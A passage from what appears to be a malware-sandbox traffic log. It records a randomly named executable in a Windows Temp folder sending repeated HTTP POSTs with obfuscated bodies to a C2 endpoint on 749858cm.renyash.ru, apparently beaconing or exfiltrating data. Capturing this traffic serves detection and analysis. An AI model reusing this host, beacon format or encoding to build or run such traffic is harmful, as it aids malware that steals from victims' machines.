Dec 17, 2024 00:08:44.999422073 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:08:45.351337910 CET	1060	OUT	Data Raw: 58 5a 43 54 5c 5b 51 58 5d 5a 59 53 57 53 5a 50 5a 5f 5f 59 51 53 52 46 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XZCT\[QX]ZYSWSZPZ__YQSRF]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y ("V>=;_'#4%.7#4]-?<%2X% '#]"F"#Y
Dec 17, 2024 00:08:46.087371111 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:46.321422100 CET	803	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SQuYVzQhYpUp35b4zRk45hQ2CbwuZ52UPcFbPnH6W9MOqPmQDk%2BCPusGQe8OgDIyYJotC%2FJap9nqykAAxxmoD0%2FQJ8SsaM%2FYhIN3E6Clht3LIfTXoLgtg3aw9bBI4sAwc1nDZ8ST"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3256531a2a42ee-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4620&min_rtt=1691&rtt_var=6492&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1350&delivery_rate=58114&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49894	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:46.593363047 CET	266	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue
Dec 17, 2024 00:08:46.945178986 CET	1060	OUT	Data Raw: 58 57 43 52 5c 5f 54 5d 5d 5a 59 53 57 5f 5a 51 5a 50 5f 5b 51 5e 52 42 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XWCR\_T]]ZYSW_ZQZP_[Q^RB]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y#+/6>>;]%3(_3[3#,)7++$2*="#$>"F"#Y 4
Dec 17, 2024 00:08:47.677783012 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:47.913743973 CET	802	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=73cxNnoGQcTwwOt8ad7OaQNpRFVvmYgtLX2C%2FSHeNmmILc2amHg4Sp8Ysr1zFkqF8M2UdgIx5hnCiRTADoD09wIE3DOkpPnj3eWLdC1YJRwRiJBQL1wYaZlvht%2BKMgZwl0NW%2F5is"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f32565d0ff818b4-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=2806&min_rtt=1432&rtt_var=3286&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1326&delivery_rate=117476&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49901	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:48.222496033 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1936 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:08:48.570152998 CET	1936	OUT	Data Raw: 58 52 43 52 59 5b 51 59 5d 5a 59 53 57 5f 5a 56 5a 55 5f 54 51 53 52 40 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XRCRY[QY]ZYSW_ZVZU_TQSR@]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y#<)[3X0 '=#98Y.:0<#V29*X6"'$>8"F"#Y 4
Dec 17, 2024 00:08:49.306756973 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:49.561326027 CET	956	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=asH7RdsvSc5%2FkT%2BC%2BSm8cUTkADOsC0kSiO3DdKn%2BuLAWgaJ%2BRDGyMZ2Xfg88zVNctEU3mjif5kHXIwUzqPFDYUUuMDx9JNyhkxPr96dhF%2BI5M7QvKcDpZd9ugjHiB5fDDFcrAXAN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3256672e45c407-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4369&min_rtt=1485&rtt_var=6326&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2226&delivery_rate=59436&cwnd=196&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0e 1a 3a 0d 33 3d 0c 5b 37 10 01 53 29 01 05 0c 27 0a 39 5d 3b 3c 3b 19 31 0d 22 58 26 54 3d 10 32 1a 30 06 23 21 2c 1f 33 31 0e 1c 31 0d 23 5d 01 1b 27 42 30 58 39 04 3f 06 3a 5d 33 09 29 1a 31 3e 11 41 25 1d 28 11 26 0d 34 0e 35 06 25 05 2f 0b 22 13 2b 2f 20 00 3a 30 31 10 34 04 21 52 0d 13 22 1b 24 06 2e 10 24 31 24 02 34 0d 3f 10 21 1a 20 0e 33 02 09 53 31 29 34 5d 30 3c 3e 1d 32 28 23 5c 3e 06 3e 1d 34 0b 34 55 28 04 20 52 2c 05 20 50 04 35 54 53 0d 0a 30 0d 0a 0d 0a Data Ascii: 98:3=[7S)'9];<;1"X&T=20#!,311#]'B0X9?:]3)1>A%(&45%/"+/ :014!R"$.$1$4?! 3S1)4]0<>2(#\>>44U( R, P5TS0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49902	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:48.345400095 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:08:48.695005894 CET	1060	OUT	Data Raw: 5d 57 43 57 5c 5d 54 5c 5d 5a 59 53 57 5a 5a 51 5a 55 5f 5a 51 5c 52 43 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: ]WCW\]T\]ZYSWZZQZU_ZQ\RC]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y#??&3Y3V#0(#- ? &1>X![ 4,>"F"#Y
Dec 17, 2024 00:08:49.437268019 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:49.687947035 CET	800	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DrJhVyIV6NjidwqmyBoLe%2FhQQrxBiu9Nm%2FI8a2l%2FdijSWIodLr0EHLljC3%2BCkZ8R8UlgnF1BIv11DpJk7B6bLmyEwRwObF6b%2BzXoPtYDlZnccpZVAVEOIIAJZLebsK8ocd6GRqdI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3256680e7a42c1-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3900&min_rtt=1718&rtt_var=5008&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1350&delivery_rate=76140&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a Data Ascii: 4<R@X
Dec 17, 2024 00:08:49.880300999 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49908	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:50.126821995 CET	266	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue
Dec 17, 2024 00:08:50.476283073 CET	1060	OUT	Data Raw: 58 57 43 54 59 5c 51 58 5d 5a 59 53 57 59 5a 50 5a 5f 5f 58 51 59 52 41 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XWCTY\QX]ZYSWYZPZ__XQYRA]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y [(?.S>[3% 40=<7- +(?1!!)%_47Z>"F"#Y ,
Dec 17, 2024 00:08:51.212404013 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:51.459161043 CET	810	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1m4SEqhZglmlYMArW%2FI6oLOB0ORUGavRi4gTiqsEBpJCmMK8i5nx08JDU%2Fo71kC%2FxuzksILegxn50xYJSkfYfvm94fX%2Fzi9QIHr%2BlEC9dpT39qmMGBEeuc%2BeBaWYlsI9MZJt8%2BsQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3256731e445e64-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=8510&min_rtt=1678&rtt_var=14294&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1326&delivery_rate=25914&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49914	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:51.714214087 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:08:52.070991993 CET	1060	OUT	Data Raw: 58 56 46 51 5c 58 54 5b 5d 5a 59 53 57 5e 5a 57 5a 50 5f 59 51 5c 52 46 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XVFQ\XT[]ZYSW^ZWZP_YQ\RF]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y X?)=+]3?0-+] $^,:;Y);+P%"1*X9 $;X>"F"#Y 0
Dec 17, 2024 00:08:52.804827929 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:53.033438921 CET	805	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wllylcGQdkrs5oKqAhbCEw%2BRyW082HUld05K%2F81l4VffXO5SPB8GaTHiQcjawGb8kqmg1igFmwGRg%2F8UfFH2svwx0bPDw4uTTQNDgIz%2B0RqK8wotGw8tV6mewZcR3FtkWcQ%2FjJP5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f32567d0c130c9c-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3429&min_rtt=1721&rtt_var=4061&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1350&delivery_rate=94897&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49915	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:53.279964924 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:08:53.632625103 CET	1060	OUT	Data Raw: 58 55 43 56 59 5b 54 5b 5d 5a 59 53 57 5d 5a 56 5a 5f 5f 5b 51 5c 52 43 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XUCVY[T[]ZYSW]ZVZ__[Q\RC]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y [??=;X'V<]3[,#'.\#);%>V>#$3Z>"F"#Y <
Dec 17, 2024 00:08:54.365751982 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:54.601501942 CET	806	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TLDVvmQa0ppcXKmg9hV%2FH8Vu2STZrTeINoI4cdDMB1Of%2BkjP9GvOzfLY694LD%2F5SuoZCFOPf3cSENyYVeB6Mz4qSSsZ8%2BxFURMvHMkGYI8JIo1wW7UFG%2BTua60etjHqcAN0N3iNR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f325686cecd7277-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3377&min_rtt=2002&rtt_var=3501&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1350&delivery_rate=112255&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49921	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:54.691989899 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1936 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:08:55.038913965 CET	1936	OUT	Data Raw: 58 52 43 5c 59 58 51 58 5d 5a 59 53 57 5a 5a 57 5a 54 5f 5d 51 53 52 42 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XRC\YXQX]ZYSWZZWZT_]QSRB]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y#<<>R==$ \3=(")4.'<R%2R(.7$')"F"#Y
Dec 17, 2024 00:08:55.793066025 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:56.049154997 CET	952	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EjK7kYJ3LeSDOEQm1zsrDAuqL%2BFMfLAQd6ckcENAbxFDGSqz%2BTH%2FcdZLAMjzqrRhkOhW6Ub9ZeFbTCxb9BWTW93gc85JWN1PibDJV8mvwolCz6vK%2FMm0n7dWaXznRAwxgbPgk3GP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f32568fbd5d8cc5-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4698&min_rtt=1968&rtt_var=6199&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2226&delivery_rate=61308&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0e 1a 39 57 24 04 3e 5b 37 07 2f 53 2b 2c 3f 0e 27 55 36 05 2f 3f 38 43 26 0d 3d 02 32 22 39 13 24 37 3b 5c 20 32 37 0e 33 0f 2f 0a 25 37 23 5d 01 1b 27 09 33 00 0f 05 28 3f 0b 00 33 23 2d 19 25 10 3f 43 31 24 27 0d 25 0d 28 0b 22 28 29 03 3b 0c 00 59 2b 01 27 16 3a 0e 00 00 20 3e 21 52 0d 13 21 0b 30 3b 26 58 30 08 28 00 34 0a 3f 5d 21 0a 01 56 33 3c 02 09 26 14 01 04 30 06 3a 5a 27 28 0a 06 29 06 39 0f 37 31 2f 0c 3f 04 20 52 2c 05 20 50 04 35 54 53 0d 0a 30 0d 0a 0d 0a Data Ascii: 989W$>[7/S+,?'U6/?8C&=2"9$7;\ 273/%7#]'3(?3#-%?C1$'%("();Y+': >!R!0;&X0(4?]!V3<&0:Z'()971/? R, P5TS0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49922	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:54.815051079 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:08:55.163758993 CET	1060	OUT	Data Raw: 58 51 46 51 5c 58 54 5a 5d 5a 59 53 57 52 5a 5e 5a 51 5f 5e 51 59 52 42 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XQFQ\XTZ]ZYSWRZ^ZQ_^QYRB]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y _<,1==307'3Z#;-$?](1"*9\4 =("F"#Y
Dec 17, 2024 00:08:55.900878906 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:56.187881947 CET	804	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nVrF0F7RZQBO3CyaH60xH0Uys%2FM3NQcbUMitFdquEbLk0hMQA3j1hq%2FcjRU3jES%2BuCF%2FFX50WU1MGymsMoc9FX8XXUkUjvi4lj%2FR9xFFBspAkK0AsYN%2BXeYcRsCSXMX9Iw%2FEyh2G"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3256906c1f426a-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4583&min_rtt=1777&rtt_var=6279&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1350&delivery_rate=60260&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a Data Ascii: 4<R@X
Dec 17, 2024 00:08:56.379504919 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49928	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:56.623142958 CET	266	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1056 Expect: 100-continue
Dec 17, 2024 00:08:56.976289988 CET	1056	OUT	Data Raw: 5d 56 43 54 59 5f 54 5c 5d 5a 59 53 57 5b 5a 55 5a 54 5f 59 51 59 52 40 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: ]VCTY_T\]ZYSW[ZUZT_YQYR@]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y#+/>=30;37[ 8,3('$2.S)=]#'\("F"#Y ,
Dec 17, 2024 00:08:57.713401079 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:57.957628012 CET	805	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=biaEDJ55Kr%2Bh%2FvDziAgWCPjXL2mL16HB1mk1VTMmb4VAr02S7fKjEysRbaiK6XBAMpWGVu%2FyksRlhS%2Fz8OFgCvGzS4i2%2BwRJqQPVnIp1amHPaMKf656XoZRZvvq88xqMDTI3Mxj3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f32569bbebb8cec-EWR alt-svc: h2=":443"; ma=60 server-timing: 